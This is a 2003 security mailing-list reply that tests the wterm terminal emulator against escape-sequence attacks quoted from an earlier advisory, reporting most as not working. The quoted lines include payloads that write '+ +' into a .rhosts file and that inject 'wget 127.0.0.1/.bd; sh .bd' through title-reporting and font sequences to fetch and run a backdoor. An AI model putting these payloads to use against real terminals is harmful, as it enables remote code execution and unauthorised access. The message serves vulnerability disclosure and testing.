Re: Terminal Emulator Security Issues

From: Juraj Ziegler (e@hq.sk)
Date: 02/25/03

  • Next message: EAB: "RE: Ericsson HM220dp ADSL modem Insecure Web Administration Vulne rability" 
    Date: Tue, 25 Feb 2003 01:23:09 +0100
From: Juraj Ziegler <e@hq.sk>
To: H D Moore <termulation@digitaloffense.net>

    Wterm was not mentioned throughout the article, so I decided to test it
    quickly.

    On Mon, Feb 24, 2003 at 03:02:52PM -0600, H D Moore wrote:o
    > $ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"

    Does not work. Code 33 is not implemented, according to the
    documentation, code 50 is used to change font [specifying movement in
    the terminal's font list].

    > $ echo -e "\e]2;This is the new window title\a"

    Works.

    > $ echo -e "\e[21t"

    echo -e "\e]2;whoo\a"
    echo -e "\e[21t"

    Changes window title to 'whoo', but nothing is pasted -> does not work.

    > $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"

    It can be deduced that this does not work either, and a quick test
    proved it.

    > $ echo -e "\eP0;0|0A/17\x9c"

    Safe from this harm, over here.

    > $ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"

    Besides of a weird output from echo itself [as no all characters where
    handled by the terminal], nothing.

    The output is: :]itd

    As to wterm's origin, it seems to be based on rxvt
    <quote site="http://largo.windowmaker.org/files.php#wterm">
    wterm started as a beta test of some additions Alfredo hoped to get
    contributed to the official rxvt source tree.
    </quote>

    Version tested: 6.2.9 - latest (even though released in 8/2001)

    [e] 

    -- 
_______________________________________________________________________________
>e@hq.sk<                   /(bb|[^b]{2})/                 >http://hq.sk/~euro<
        "always know what you say, but do not always say what you know"

    • application/pgp-signature attachment: stored